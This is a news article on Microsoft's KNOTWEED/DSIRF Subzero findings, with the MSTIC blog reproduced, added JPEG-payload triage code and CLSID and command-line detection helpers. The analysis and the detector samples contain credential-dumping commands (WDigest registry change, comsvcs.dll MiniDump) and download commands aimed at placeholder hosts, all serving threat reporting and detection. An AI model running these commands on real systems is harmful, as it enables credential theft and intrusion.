A cyber mercenary that "ostensibly sells general security and information analysis services to commercial customers" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities.
The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called [DSIRF](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) that's linked to the development and attempted sale of a piece of cyberweapon referred to as **Subzero**, which can be used to hack targets' phones, computers, and internet-connected devices.
"Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama," the tech giant's cybersecurity teams [said](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) in a Wednesday report.
Microsoft is [tracking](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>) the actor under the moniker KNOTWEED, continuing its practice of naming PSOAs after trees and shrubs. The company previously assigned the name [SOURGUM](<https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html>) to Israeli spyware vendor Candiru.
KNOTWEED is known to dabble in both access-as-a-service and [hack-for-hire](<https://thehackernews.com/2022/06/google-blocks-dozens-of-malicious.html>) operations, offering its toolset to third parties as well as directly associating itself in certain attacks.
While the former entails the sales of end-to-end hacking tools that can be used by the purchaser in their own operations without the involvement of the offensive actor, hack-for-hire groups run the targeted operations on behalf of their clients.
The deployment of Subzero is said to have transpired through the exploitation of numerous issues, including an attack chain that abused an unknown Adobe Reader remote code execution (RCE) flaw and a zero-day privilege escalation bug ([CVE-2022-22047](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>)), the latter of which was addressed by Microsoft as part of its July Patch Tuesday updates.
"The exploits were packaged into a PDF document that was sent to the victim via email," Microsoft explained. "CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes and achieve system-level code execution."
Similar attack chains observed in 2021 combined two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) with an Adobe Reader flaw (CVE-2021-28550). The three vulnerabilities were [resolved](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) in June 2021.
The deployment of Subzero subsequently occurred through a fourth exploit, this time taking advantage of a privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>)), which was closed by Microsoft in August 2021.
Beyond these exploit chains, Excel files masquerading as real estate documents have been used as a conduit to deliver the malware, with the files containing [Excel 4.0 macros](<https://thehackernews.com/2022/01/emotet-now-using-unconventional-ip.html>) designed to kick-start the infection process.
Regardless of the method employed, the intrusions culminate in the execution of shellcode that retrieves a second-stage payload called Corelump from a remote server, in the form of a JPEG image that also embeds a loader named Jumplump, which in turn loads Corelump into memory.
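Microsoft's write-up, reproduced further down this page, gives the layout of that JPEG: the payload sits past the 0xFF 0xD9 end-of-image marker, introduced by a 16-byte marker and then a 16-byte RC4 key. The following is an added triage helper (not Microsoft's, THN's or the actor's code) that walks the JPEG segment structure to find the real end-of-image, reports and measures any trailing bytes, and carves and decrypts them under that layout when the analyst already knows the marker; the marker, key and payload bytes it uses are constructed for the demo.

```python
"""Triage a JPEG for data appended past the EOI marker (Corelump layout).

Added example, not Microsoft's or the actor's code.  Layout after EOI per the
write-up above: 16-byte marker, 16-byte RC4 key, RC4-encrypted loader.  Walks
the segment structure to find the real EOI (the last FFD9 may belong to an
EXIF thumbnail).  Marker, key and payload values below are constructed.
"""
import math

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
NO_LENGTH = {0x01, *range(0xD0, 0xD8)}  # TEM and RST0..RST7 carry no length field
STUFFED = {0x00, *range(0xD0, 0xD8)}    # FF00 byte stuffing, FFD0..D7 restart markers

def jpeg_eoi_end(data: bytes) -> int:
    """Offset just past the EOI marker, found by walking segments from SOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        while pos < len(data) and data[pos] == 0xFF:  # skip optional fill bytes
            pos += 1
        if pos >= len(data):
            break
        marker = data[pos]
        pos += 1
        if marker == EOI:
            return pos
        if marker == SOI or marker in NO_LENGTH:
            continue
        pos += int.from_bytes(data[pos:pos + 2], "big")  # length includes itself
        if marker == SOS:
            # Scan data: an FF not followed by 00 or D0..D7 starts the next marker.
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] not in STUFFED:
                    break
                pos += 1
    raise ValueError("no EOI marker found")

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: RC4 output sits near 8.0, plaintext or code well below."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); encrypting and decrypting are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def triage(data: bytes, known_marker: bytes = b"") -> dict:
    """Report bytes past EOI; decrypt them if the 16-byte marker matches."""
    end = jpeg_eoi_end(data)
    trailer = data[end:]
    report = {
        "eoi_end": end,
        "trailer_len": len(trailer),
        "trailer_entropy": round(shannon_entropy(trailer), 2),
        "suspicious": len(trailer) >= 32,  # room for marker + key + payload
        "decrypted": None,
    }
    if known_marker and trailer[:16] == known_marker:
        report["decrypted"] = rc4(trailer[16:32], trailer[32:])  # key follows marker
    return report

def build_sample(trailer: bytes) -> bytes:
    """Constructed minimal JPEG (SOI, APP0, SOS, 7 scan bytes, EOI) plus trailer."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"  # holds a stuffed FF00 and an RST0 marker
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + trailer

# Constructed demo values, not the real KNOTWEED marker or key.
DEMO_MARKER = b"DEMO-MARKER-0001"
DEMO_KEY = b"0123456789abcdef"
DEMO_PAYLOAD = b"loader shellcode placeholder"
DEMO_JPEG = build_sample(DEMO_MARKER + DEMO_KEY + rc4(DEMO_KEY, DEMO_PAYLOAD))

if __name__ == "__main__":
    print(triage(build_sample(b"")))
    print(triage(DEMO_JPEG, known_marker=DEMO_MARKER))
```

Without the marker the helper still flags the file (long, high-entropy trailer after a structurally valid JPEG), which is the signal worth alerting on in a proxy or mail gateway.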
The evasive implant comes with a wide range of capabilities, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from the remote server.
Also deployed during the attacks were bespoke utilities like Mex, a command-line tool to run open source security software like Chisel, and PassLib, a tool to dump credentials from web browsers, email clients, and the Windows credential manager.
Microsoft said it uncovered KNOTWEED actively serving malware since February 2020 through infrastructure hosted on DigitalOcean and Choopa, alongside identifying subdomains that are used for malware development, debugging Mex, and staging the Subzero payload.
Multiple links have also been unearthed between DSIRF and the malicious tools used in KNOTWEED's attacks.
"These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF," Redmond noted.
Subzero is no different from off-the-shelf malware such as [Pegasus](<https://thehackernews.com/2022/07/pegasus-spyware-used-to-hack-devices-of.html>), [Predator](<https://thehackernews.com/2022/05/cytroxs-predator-spyware-target-android.html>), [Hermit](<https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html>), and [DevilsTongue](<https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html>), which are capable of infiltrating phones and Windows machines to remotely control the devices and siphon off data, sometimes without requiring the user to click on a malicious link.
If anything, the latest findings highlight a burgeoning international market for such sophisticated surveillance technologies to carry out targeted attacks aimed at members of civil society.
Although companies that sell commercial spyware advertise their wares as a means to tackle serious crimes, evidence gathered so far has found [several instances](<https://thehackernews.com/2022/06/nso-confirms-pegasus-spyware-used-by-at.html>) of these tools being misused by authoritarian governments and private organizations to snoop on human rights advocates, journalists, dissidents, and politicians.
Google's Threat Analysis Group (TAG), which is tracking over 30 vendors that hawk exploits or surveillance capabilities to state-sponsored actors, said the booming ecosystem underscores "the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments."
"These vendors operate with deep technical expertise to develop and operationalize exploits," TAG's Shane Huntley [said](<https://blog.google/threat-analysis-group/googles-efforts-to-identify-and-counter-spyware/>) in testimony before the U.S. House Intelligence Committee on Wednesday, adding, "its use is growing, fueled by demand from governments."
Record metadata for this article: title "Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits"; reporter: The Hacker News; published 2022-07-28T11:18:00, modified 2022-07-29T02:58:07; URL: https://thehackernews.com/2022/07/microsoft-uncover-austrian-company.html; CVEs covered: CVE-2021-28550, CVE-2021-31199, CVE-2021-31201, CVE-2021-36948, CVE-2022-22047; CVSS v2 base score 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C), CVSS v3.1 base score 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
The Microsoft Security blog post referenced above (MSTIC/MSRC; record last seen 2022-07-27T17:42:56), reproduced from the accompanying record:

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.

This blog details Microsoft's analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED's malware and tools.

PSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations.
Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.

## Who is KNOTWEED?

KNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services *"to multinational corporations in the technology, retail, energy and financial sectors"* and that they have *"a set of highly sophisticated techniques in gathering and analyzing information."* They publicly offer several services including *"an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities"* and *"highly sophisticated Red Teams to challenge your company's most critical assets."*

However, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft's communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity.
Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It's important to note that the identification of targets in a country doesn't necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.

MSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.

## Observed actor activity

### KNOTWEED initial access

MSTIC found KNOTWEED's Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump_ for the persistent loader and _Corelump_ for the main malware.

#### KNOTWEED exploits in 2022

In May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim's Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED's extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047.
Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we've seen no evidence of browser-based attacks.

The CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process is spawned.

CVE-2022-22047 was used in KNOTWEED-related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.

It's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn't considered dangerous.
Hence, these sandboxes aren't a barrier to the exploitation of CVE-2022-22047.

#### KNOTWEED exploits in 2021

In 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.

We were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by 'DSIRF GmbH'.

Figure 1. Valid digital signature from DSIRF on Medic Service exploit DLL

#### Malicious Excel documents

In addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.

Figure 2: Two examples of KNOTWEED Excel macro obfuscation

After de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_.
Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.

Figure 3: Copying opcodes

Figure 4: Calling CreateThread on shellcode

The following section describes the shellcode executed by the macro.

### KNOTWEED malware and tactics, techniques, and procedures (TTPs)

#### Corelump downloader and loader shellcode

The downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor's command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user's _%TEMP%_ directory.

Figure 5: One of the images embedded with the loader shellcode and Corelump

The downloader shellcode searches for a 16-byte marker immediately following the end of the JPEG. After finding the marker, the downloader shellcode RC4-decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4-decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.

#### Corelump malware

_Corelump_ is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED's C2 server.

As part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code.
As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile_. These trojanized binaries (_Jumplump_) are dropped to disk in `C:\Windows\System32\spool\drivers\color\`, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).

#### Jumplump loader

_Jumplump_ is responsible for loading _Corelump_ into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both _Jumplump_ and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.

Figure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump

#### Mex and PassLib

KNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources.
Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [SharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n\nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources, including web browsers, email clients, LSASS, LSA secrets, and the Windows Credential Manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting _UseLogonCredential_ to "1" to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempting to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub 
gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February 2020 and continues to do so as of this writing.\n\nRiskIQ next used passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website) and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump_ drops the _Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\_. 
This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., the default value of _HKLM\\SOFTWARE\\Classes\\CLSID\\{GUID}\\InProcServer32_). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = "_%SystemRoot%\\System32\\ApplicationFrame.dll_"\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = "_%SystemRoot%\\system32\\propsys.dll_"\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = "_%SystemRoot%\\system32\\wbem\\wbemprox.dll_"\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = "_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_"\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = "_%SystemRoot%\\System32\\Actioncenter.dll_"\n\nMany of the post-compromise actions can be detected based on their command lines. 
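An offline check covering both the CLSID baseline listed above and the command lines from the post-compromise actions section, as an added example that is not part of Microsoft's post. It compares collected InProcServer32 default values against the clean Windows 11 values, flags any of the five that now points into the color-profile folder, and tags command lines matching the WDigest downgrade, comsvcs.dll MiniDump, PowerShell-from-internet and Curl download patterns; the host snapshot and command lines below are constructed samples with placeholder URLs.

```python
"""Baseline check for the five hijacked CLSIDs and tagging of the observed
post-compromise command lines. Added example, not code from Microsoft's post;
the host snapshot and command lines below are constructed samples."""
import re
from typing import Dict, List, Tuple

COLOR_DIR = r"c:\windows\system32\spool\drivers\color"

# Clean InProcServer32 defaults on Windows 11 for the CLSIDs Jumplump hijacks (from the post)
CLEAN_CLSID_DEFAULTS: Dict[str, str] = {
    "{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}": r"%SystemRoot%\System32\ApplicationFrame.dll",
    "{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}": r"%SystemRoot%\system32\propsys.dll",
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": r"%SystemRoot%\system32\wbem\wbemprox.dll",
    "{4de225bf-cf59-4cfc-85f7-68b90f185355}": r"%SystemRoot%\system32\wbem\wmiprvsd.dll",
    "{f56f6fdd-aa9d-4618-a949-c1b91af43b1a}": r"%SystemRoot%\System32\Actioncenter.dll",
}


def normalize_path(value: str, system_root: str = r"C:\Windows") -> str:
    """Strip quotes, expand %SystemRoot% and case-fold so equivalent paths compare equal."""
    v = value.strip().strip('"')
    v = re.sub(r"%systemroot%", lambda _m: system_root, v, flags=re.IGNORECASE)
    return v.lower()


def check_clsid_defaults(observed: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """observed maps CLSID -> InProcServer32 default value collected from a host
    (e.g. parsed from a registry export). Returns (clsid, value, reason) per deviation."""
    findings: List[Tuple[str, str, str]] = []
    for clsid, value in observed.items():
        key = clsid.lower()
        if key not in CLEAN_CLSID_DEFAULTS:
            continue  # only the five baselined CLSIDs are judged here
        got = normalize_path(value)
        if got.startswith(COLOR_DIR):
            findings.append((key, value, "InProcServer32 points into spool\\drivers\\color"))
        elif got != normalize_path(CLEAN_CLSID_DEFAULTS[key]):
            findings.append((key, value, "InProcServer32 differs from clean baseline"))
    return findings


# Patterns for the post-compromise command lines described in the post
COMMAND_LINE_RULES = [
    ("wdigest_plaintext_enabled",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*securityproviders\\wdigest.*uselogoncredential.*\s/d\s+1\b", re.I)),
    ("lsass_minidump_comsvcs",
     re.compile(r"\brundll32(?:\.exe)?\b.*comsvcs\.dll\s*,\s*minidump\b", re.I)),
    ("powershell_script_from_internet",
     re.compile(r"\bpowershell(?:\.exe)?\b.*(?:https?://|gist\.github(?:usercontent)?\.com)", re.I)),
    ("curl_download",
     re.compile(r"\bcurl(?:\.exe)?\b.*https?://", re.I)),
]


def classify_command_line(cmd: str) -> List[str]:
    """Return the names of every rule the command line matches (empty list if none)."""
    return [name for name, rx in COMMAND_LINE_RULES if rx.search(cmd)]


# --- constructed samples -------------------------------------------------------
SAMPLE_CLSID_SNAPSHOT = {
    "{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}": r"%SystemRoot%\System32\ApplicationFrame.dll",
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": r"C:\Windows\System32\spool\drivers\color\wbemprox.dll",
    "{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}": r"C:\Windows\System32\Actioncenter.dll",
}
SAMPLE_COMMAND_LINES = [
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump",
    r"powershell.exe -Command iwr https://gist.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-ID/raw",
    r"curl.exe -o C:\Users\Public\t.zip https://EXAMPLE-BUCKET.vultrobjects.com/t.zip",
    r"notepad.exe C:\Users\victim\notes.txt",
]

if __name__ == "__main__":
    for finding in check_clsid_defaults(SAMPLE_CLSID_SNAPSHOT):
        print("CLSID finding:", finding)
    for cmd in SAMPLE_COMMAND_LINES:
        print(classify_command_line(cmd) or ["-"], cmd)
```

The third snapshot entry shows why normalisation matters: an already-expanded but otherwise clean path must not raise a finding, while a value rewritten to the color folder must.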
Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest_, and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring that runtime macro scanning by the Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature, which is enabled by default, is on if the Group Policy setting for Macro Run Time Scan Scope is set to "Enable for All Files" or "Enable for Low Trust Files".\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. 
_Note:_ Microsoft strongly encourages all customers to download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware 